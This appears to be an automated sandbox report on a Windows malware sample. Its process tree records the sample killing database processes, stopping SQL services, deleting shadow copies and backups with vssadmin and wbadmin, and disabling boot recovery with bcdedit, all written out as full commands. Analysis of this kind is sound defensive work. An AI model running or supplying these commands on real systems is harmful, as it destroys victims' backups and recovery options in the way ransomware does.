Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3300
-
C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe"C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3376 -
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\taskkill.exetaskkill -f -im sql writer.exe5⤵
- Kills process with taskkill
PID:4404
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵PID:4348
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵PID:2260
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵PID:4536
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵PID:768
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵PID:2668
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵PID:3904
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵PID:3076
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵PID:3092
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵PID:4412
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵PID:4196
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe3⤵PID:3836
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe4⤵PID:2220
-
C:\Windows\system32\taskkill.exetaskkill -f -impostgres.exe5⤵
- Kills process with taskkill
PID:1684
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵PID:4824
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵PID:4344
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵PID:3276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵PID:4424
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵PID:2284
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵PID:1484
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵PID:4132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵PID:3228
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵PID:4516
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵PID:332
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵PID:2932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵PID:2084
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵PID:2260
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵PID:2948
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵PID:2480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵PID:2980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵PID:3124
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵PID:3156
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵PID:4972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵PID:1956
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵PID:2916
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵PID:4900
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵PID:3332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵PID:1132
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵PID:1548
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS4⤵PID:4604
-
C:\Windows\system32\net.exenet stop REportServer$ISARS5⤵PID:3840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS6⤵PID:4208
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵PID:1100
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵PID:456
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵PID:1556
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵PID:996
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:3104
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1468
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵PID:3308
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:4292
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
PID:3532
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵PID:32
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵PID:4692
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest5⤵PID:4836
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵PID:2220
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet4⤵PID:3836
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet5⤵
- Deletes system backups
- Drops file in Windows directory
PID:4396
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵PID:4532
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No4⤵PID:3396
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No5⤵
- Modifies boot configuration data using bcdedit
PID:1096
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵PID:3564
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:740
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:2948
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵PID:2884
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:4496
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe\\?\C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -network2⤵
- System policy modification
PID:3292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:1472
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:81⤵PID:4136
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD56fedb1c2ef1dde2da864bf98b271675b
SHA11393fd16b3c6468e6dbd009e90644d51eaff7ecb
SHA256c2ec79ee0c21c94c4c68339e5e569ef2e8d2d716fe3b9ba22070699b6a2499ca
SHA5125f3f2c1f4dc7a7761c70dd996a152616d8a948e577ff451330df6f8aa0349fad5c82b021f73fa3d880a647094a6fb217c14c11ffee925a11136af8bb139d8e64